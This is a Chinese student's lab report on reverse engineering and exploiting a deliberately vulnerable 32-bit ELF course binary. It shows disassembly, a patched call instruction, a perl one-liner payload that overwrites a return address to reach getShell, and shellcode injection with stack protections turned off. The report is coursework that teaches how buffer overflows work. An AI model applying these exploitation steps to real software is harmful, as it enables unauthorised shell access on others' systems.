2017-2018-2 20155225《网络对抗技术》实验一 PC平台逆向破解

1、直接修改程序机器指令，改变程序执行流程

理清思路：

我们的目标文件是一个linux可执行文件，格式为ELF（Executable and Linkable Format）。
反汇编，观察文件执行流程。反汇编命令objdump，-d：反汇编代码段代码。
发现主函数里调用了foo函数，通过一个call指定，跳转到foo函数的地址8048491，对应的机器码是e8 d7 ff ff ff，e8代表call，d7 ff ff ff就代表了地址8048491，getshell函数的地址是804847d，两个函数的地址偏移量是14，d7 ff ff ff减去14为c3 ff ff ff。所以，只需将d7 ff ff ff修改为c3 ff ff ff即可。
用vi打开目标文件，发现是乱码。因为该文件是二进制文件，vi按照文本文件打开，根本解析不出来。所以在vi里输入:%!xxd，转换为十六进制显示。再通过/e8d7，找到要修改的位置。
按i进入插入模式，修改。
再转换16进制为原格式:%!xxd -r，保存退出:wq
重新反汇编，成功调用了getshell函数。

2、通过构造输入参数，造成BOF攻击，改变程序执行流

观察反汇编代码。我首先重新学习了一遍《深入理解计算机系统》里关于过程的栈帧变化。仅通过读这个反汇编代码，就可以看清栈帧的内容，准确预测出需要注入代码的位置。并且预测结果和实际结果相符。反汇编代码如下，我通过读代码，回答老师挖空的两个问题。

0804847d <getShell>:

 804847d:	55                   	push   %ebp

 804847e:	89 e5                	mov    %esp,%ebp

 8048480:	83 ec 18             	sub    $0x18,%esp

 8048483:	c7 04 24 60 85 04 08 	movl   $0x8048560,(%esp)

 804848a:	e8 c1 fe ff ff       	call   8048350 <system@plt>

 804848f:	c9                   	leave

 8048490:	c3                   	ret    

== 该可执行文件正常运行是调用如下函数foo，这个函数有Buffer overflow漏洞  ==

08048491 <foo>:

 8048491:	55                   	push   %ebp

 8048492:	89 e5                	mov    %esp,%ebp

 8048494:	83 ec 38             	sub    $0x38,%esp

 8048497:	8d 45 e4             	lea    -0x1c(%ebp),%eax

 804849a:	89 04 24             	mov    %eax,(%esp)

 == 这里读入字符串，但系统只预留了_28_字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址 ==

 804849d:	e8 8e fe ff ff       	call   8048330 <gets@plt>

 80484a2:	8d 45 e4             	lea    -0x1c(%ebp),%eax

 80484a5:	89 04 24             	mov    %eax,(%esp)

 80484a8:	e8 93 fe ff ff       	call   8048340 <puts@plt>

 80484ad:	c9                   	leave

 80484ae:	c3                   	ret    

080484af <main>:

 80484af:	55                   	push   %ebp

 80484b0:	89 e5                	mov    %esp,%ebp

 80484b2:	83 e4 f0             	and    $0xfffffff0,%esp

 80484b5:	e8 d7 ff ff ff       	call   8048491 <foo>

 ==上面的call调用foo,同时在堆栈上压上返回地址值:___80484ba_______== 

  80484ba:	b8 00 00 00 00       	mov    $0x0,%eax

读这个反汇编代码时，需要复习栈帧结构图:

如图，我们的目标是P函数（main函数）的返回地址。

返回地址下面的区域是被保存的寄存器。

寄存器组是唯一被所有过程共享的资源。我们必须保证被调函数不会覆盖调用函数稍后会使用的值。所以所有过程都必须遵循寄存器使用规则：1.%rbx,%rbp和%r12~%r15被分为调用者保存寄存器，即被调者需要将这些寄存器的值压入栈中，调用结束后再恢复出来。——《深入理解计算机系统》

所以，我们可以理解为什么foo函数第一条指令是push %epb。将%epb压栈，所以被保存寄存器这一段占4字节。

局部变量区域。这里存放foo函数声明的局部变量，肯定就是buffer了！

ebp压栈保护后，栈指针esp存入ebp，-0x1c(%ebp)在ebp为基地址，偏移-0x1c即28个字节。这个空间就是buffer空间！

保存寄存器占4字节，buffer占28字节，一共32字节，在32字节后4字节即我们要找的返回地址！

再用老师讲的方法验证我的预测是否正确：

发现55555555中的4字节溢出到返回地址了！

发现1234这4字节溢出到返回地址！和我之前的预测一致！

找到位置后，只要把1234的位置换成getshell函数的地址\x08\x04\x84\x7d即可。直接输入是不行，先写到一个文件Input里，再将文件内容作为输入即可。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08"' > input //-e：perl调用print函数所需参数

xxd input //d:display,xx:十六进制,以十六进制查看

（cat input ; cat）| ./20155225pwn //将Input文件内容作为输入

过程如下图所示：

3、注入Shellcode并执行

首先需要搞清楚什么是shellcode，shellcode是一段机器码程序，其功能是得到一个系统shell。

和前面的getshell功能一致，唯一的区别在于，getshell是可执行程序里已有的，只是用户不可见，而shellcode是hacker自己编写的，可以实现任何功能。

攻击思路还是利用缓冲区溢出，修改返回地址，只不过返回地址不再是修改为getshell的地址，而是shellcode的地址。

这是原来的堆栈结构:

有下面两种思路，第一种是老师挖的坑，跳了……

尝试第二种思路，选择将shellcode放在shellcode后面，返回地址以shellcode地址填充即可。

理清思路就可以开始做了!

预备工作：

设置堆栈可执行、关闭地址随机化，如图所示。

找shellcode地址：

注意，使用第二种方式注入，但要使用第一种方法找地址，因为第二种方式注入代码超过36字节，溢出则无法用gdb看堆栈。如下图所示：

只要找到01020304的位置在0xffffd38c，再加4字节就是shellcode的起始地址了！即0xffffd390。如图：

注入成功：

实验中遇到的问题

如何修改主机名

在网上找到修改主机名的方法，可以修改主机名相关的配置文件：/etc/hosts和/etc/sysconfig/network。但是我找不到/etc/sysconfig/network这个文件，暂时先只能每次开机用hostname命令修改了。

如何进入和退出gdb调试器

进入：输出gdb <可执行文件名>；退出：输入quit，或者按下Ctrl+d

使用execstack命令时，提示我没有这个命令

使用这个命令安装，sudo apt-get install execstack。

实验收获与感想

通过这次实验，我感觉收获良多。1、真实体验了一把漏洞攻击，还是很有成就干的。重新复习了过程调用中的堆栈结构，对整个攻击过程更清晰地理解了。

2、至于什么是漏洞这个问题，我的理解是，漏洞是利用操作系统运行应用程序的机制，通过一些巧妙的方法，修改应用系统的运行流程，达到自己的目标。

3、漏洞的危害：漏洞的存在会导致系统安全性降低，一旦黑客利用漏洞，运行了shellcode，就相当于整机暴露给黑客了。

4、掌握NOP、JNE、JE、JMP、CMP汇编指令的机器码

NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90）

JNE：条件转移指令，如果不相等则跳转。（机器码：75）

JE：条件转移指令，如果相等则跳转。（机器码：74）

JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）

CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。